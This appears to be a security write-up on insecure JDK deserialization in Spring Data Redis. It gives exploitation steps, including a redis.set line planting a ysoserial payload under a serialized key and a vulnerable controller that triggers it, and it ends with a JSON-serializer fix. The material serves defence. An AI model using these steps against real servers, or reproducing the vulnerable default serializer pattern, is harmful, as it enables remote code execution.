Spring Data Redis Insecure Deserialization
Spring Data Redis overview
Spring Data Redis, part of the larger Spring Data family, provides easy configuration and access to Redis from Spring applications. Spring Data Redis serializes every key and value before writing it to Redis. By default, Java native (JDK) serialization is used for this step.
Insecure deserialization
When Spring Data Redis reads a value back from Redis, the stored serialized bytes are deserialized with the same default serializer. Because the target class is neither checked nor filtered during deserialization, anyone who can write arbitrary bytes into Redis can make the application deserialize a gadget chain, which leads to remote code execution.
Example of exploitation:
Generate payload with ysoserial
Write the generated payload in Redis:
// Try to choose a key that already exists in Redis so that code execution can start when Spring retrieves data.
// The key is written in its JDK-serialized form, because by default the key is serialized the same way as the value:
// \xac\xed\x00\x05 is the serialization stream header, t\x00\b is TC_STRING followed by the 8-byte length, then "rebeyond".
redis.set("\xac\xed\x00\x05t\x00\brebeyond", payload);
Trigger or wait for Spring to retrieve data, example of vulnerable code:
import java.io.Serializable;

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.data.redis.core.RedisTemplate;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.GetMapping;

@Controller
public class HelloController {

    // Default RedisTemplate: keys and values go through JDK serialization on write and JDK deserialization on read
    @Autowired
    protected RedisTemplate<Serializable, Serializable> redisTemplate;

    @GetMapping("/")
    public String index() {
        // Reading the key deserializes whatever bytes are stored under it
        Object result = redisTemplate.opsForValue().get("rebeyond");
        return "index";
    }
}
Server starts calculator successfully:
The call stack is as follows:
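The fix is to stop round-tripping values through JDK serialization. The configuration below is an added example, not code from the original page: it declares a RedisTemplate bean that uses plain strings for keys and JSON for values, so a byte sequence written into Redis by a third party is parsed as JSON rather than handed to ObjectInputStream. The class name RedisConfig and the bean name are assumptions.

```java
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.data.redis.connection.RedisConnectionFactory;
import org.springframework.data.redis.core.RedisTemplate;
import org.springframework.data.redis.serializer.GenericJackson2JsonRedisSerializer;
import org.springframework.data.redis.serializer.StringRedisSerializer;

// Hypothetical configuration class (not part of the original page).
// Overrides Spring Boot's default RedisTemplate so that neither keys nor values
// are (de)serialized with JdkSerializationRedisSerializer.
@Configuration
public class RedisConfig {

    @Bean
    public RedisTemplate<String, Object> redisTemplate(RedisConnectionFactory connectionFactory) {
        RedisTemplate<String, Object> template = new RedisTemplate<>();
        template.setConnectionFactory(connectionFactory);

        // Keys: stored as raw UTF-8 strings, so "rebeyond" is the literal key, not a serialized String object.
        StringRedisSerializer keySerializer = new StringRedisSerializer();
        template.setKeySerializer(keySerializer);
        template.setHashKeySerializer(keySerializer);

        // Values: JSON via Jackson. A malicious JDK serialization stream stored under a key
        // is now a JSON parse error on read instead of a gadget-chain execution.
        GenericJackson2JsonRedisSerializer valueSerializer = new GenericJackson2JsonRedisSerializer();
        template.setValueSerializer(valueSerializer);
        template.setHashValueSerializer(valueSerializer);

        // Required when constructing the template manually outside of Boot's auto-configuration.
        template.afterPropertiesSet();
        return template;
    }
}
```

Two caveats. GenericJackson2JsonRedisSerializer writes a type hint (an @class property) into the JSON so it can rebuild arbitrary value types; if the value type under a key is fixed, the narrower Jackson2JsonRedisSerializer<T> bound to that one class is the stricter choice. And where some legacy keys must keep JDK serialization, a JVM-wide JEP 290 filter (the jdk.serialFilter system property with an explicit allow-list ending in !*) limits which classes ObjectInputStream will instantiate; treat it as defence in depth, not as a substitute for removing JDK serialization from the data path.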